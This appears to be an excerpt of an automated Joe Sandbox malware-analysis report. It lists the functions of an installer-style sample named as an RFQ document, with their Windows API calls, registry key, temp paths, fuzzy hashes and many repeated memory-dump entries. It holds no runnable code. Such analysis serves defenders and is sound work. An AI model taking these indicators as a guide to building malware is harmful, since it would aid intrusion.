Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: d4491ad1612d2206b512eee90ead875262f305b7d8c2e0605547a046ec5ba4d4
Instruction ID: a8e1189db69026d3652efcc6ea6e12950466f7228f8283b9583ebcadfcee3162
Opcode Fuzzy Hash: d4491ad1612d2206b512eee90ead875262f305b7d8c2e0605547a046ec5ba4d4
Instruction Fuzzy Hash: 8D215031904108BADF11AFA5CE49A9E7AB1BF44359F20413BF105B91E1CBBD89829A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00402304 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(74DF3420,00425F58,00425710,00405F41,00425710,00425710,00000000,00425710,00425710,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895

lstrlenW.KERNEL32 ref: 00402344
lstrlenW.KERNEL32(00000000), ref: 0040234F
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 40baac16729f7af862486c2703e7d92724be2a2b5509ba67ddea1d26ce7a737a
Instruction ID: e570f7e88bbeadde5f19d209a5805755c0aba3de4ac721a8bb04e236ab5037c1
Opcode Fuzzy Hash: 40baac16729f7af862486c2703e7d92724be2a2b5509ba67ddea1d26ce7a737a
Instruction Fuzzy Hash: 93117071D00318AADB10EFF9DD09A9EB6B8AF14308F10443FA401FB2D1D6BCC9418B59

Uniqueness

Uniqueness Score: -1.00%

Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
RegEnumValueW.KERNELBASE(00000000,00000000,?,?), ref: 004025E9
RegCloseKey.KERNELBASE(?,?,?,Software\ukasens\,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: f2ec96edeeb850ff5047f7ad69cd7e6550d5aea9249add4f3bdbefeabd51530f
Instruction ID: fdeb1b79bd1b5feb028a75c257e649ad2cddb418c0fd83a6570d1db0005c2465
Opcode Fuzzy Hash: f2ec96edeeb850ff5047f7ad69cd7e6550d5aea9249add4f3bdbefeabd51530f
Instruction Fuzzy Hash: 7D017171904205BFEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D

Uniqueness

Uniqueness Score: -1.00%

Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
RegCloseKey.KERNELBASE(?,?,?,Software\ukasens\,00000000,00000011,00000002), ref: 00402602

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 89683d1302732252eca576a74d4f43b04327f752612dd99879bde81c48f7d986
Instruction ID: b0e4e1b430255f92fa12a8c2637aeeefdc8d450e0dea4cce8f1fdd2cec8de2f5
Opcode Fuzzy Hash: 89683d1302732252eca576a74d4f43b04327f752612dd99879bde81c48f7d986
Instruction Fuzzy Hash: 61116A71900219EBDF14DFA0DA989AEB7B4BF04349F20447FE406B62C0D7B84A45EB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00402439 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
RegCloseKey.ADVAPI32(00000000), ref: 00402464

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: f7d9b6188e26d8b8bd7857278ac2ba4e7e8dd469b66377e4ae51abd26ee29025
Instruction ID: 823524eaaa32c5521ce5516f6f818df3cdafdbc5371ac3c1d9ba599ed9425974
Opcode Fuzzy Hash: f7d9b6188e26d8b8bd7857278ac2ba4e7e8dd469b66377e4ae51abd26ee29025
Instruction Fuzzy Hash: 46F06232A04520ABDB10BBA89A8DAEE62B5AF54314F11443FE502B71C1CAFC4D02976D

Uniqueness

Uniqueness Score: -1.00%

Function 00405679 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405689

Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE

OleUninitialize.OLE32(00000404,00000000), ref: 004056D5

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
Instruction ID: 475fcf9b7f10ddbfaf371a97523a1b3de976bd413908d41e9885f35b47f6a1cd
Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
Instruction Fuzzy Hash: 34F09A776007409BEA215795AE06B6777B4EB94304F85483AEF8CA26F1CB7A4C028B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401F01
EnableWindow.USER32(00000000,00000000), ref: 00401F0C

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: a6b89ba8af6c1e3efb140ba777124f975671acfc2916f9b89d602844ba5f78df
Instruction ID: a6cb0e5ea3b461fc76251f348ffd86be0a73501dc920cd99368f231d5504fafc
Opcode Fuzzy Hash: a6b89ba8af6c1e3efb140ba777124f975671acfc2916f9b89d602844ba5f78df
Instruction Fuzzy Hash: F2E09A36A082049FE705EBA8AE484AEB3B0EB40325B200A7FE001F11C0CBB94C00866C

Uniqueness

Uniqueness Score: -1.00%

Function 00405B04 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B2D
CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B3A

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
Instruction ID: ee07c3f2d7011aacc779afc4df031ab31c5939bdda65a61cc684f2ad200dc2b8
Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
Instruction Fuzzy Hash: 7FE0BFB4610219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551E774A9148A78

Uniqueness

Uniqueness Score: -1.00%

Function 00401578 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?), ref: 0040158C
ShowWindow.USER32(?), ref: 004015A1

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: da8f5b3a0ed61ba078bfb6436fd17e61c31a2c873ebe17cf9d29e996690946fc
Instruction ID: add67a47d66b636189698deb609c527a6af1c8d9f2ae6a081c6d5e40f6b59c33
Opcode Fuzzy Hash: da8f5b3a0ed61ba078bfb6436fd17e61c31a2c873ebe17cf9d29e996690946fc
Instruction Fuzzy Hash: 30E04F72B11214ABCB15DBA8EDD086E73B6EB48320350443FD102B3690CB759C458B58

Uniqueness

Uniqueness Score: -1.00%

Function 00406915 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
GetProcAddress.KERNEL32(00000000,?), ref: 00406942

Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
Part of subcall function 004068A5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040690B

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A

Uniqueness

Uniqueness Score: -1.00%

Function 00406011 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030C2,00437800,80000000,00000003), ref: 00406015
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406037

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00405FEC Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BF1,?,?,00000000,00405DC7,?,?,?,?), ref: 00405FF1
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406005

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 701c1f243114c6c95f20a1fe0a395a260d282ed21d39929bf23a1ad3933a3a4e
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: E9D0C972504220AFD2102728AE0889BBB55DB54271B028A35F8A9A22B0CB314C668694

Uniqueness

Uniqueness Score: -1.00%

Function 00405ACF Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1666846826.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666879868.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666899327.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667012394.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-SulselBarruII2-COALCOMMLDOC.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023EE

Memory Dump Source

Source File: 00000000.00000002.1666865220.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

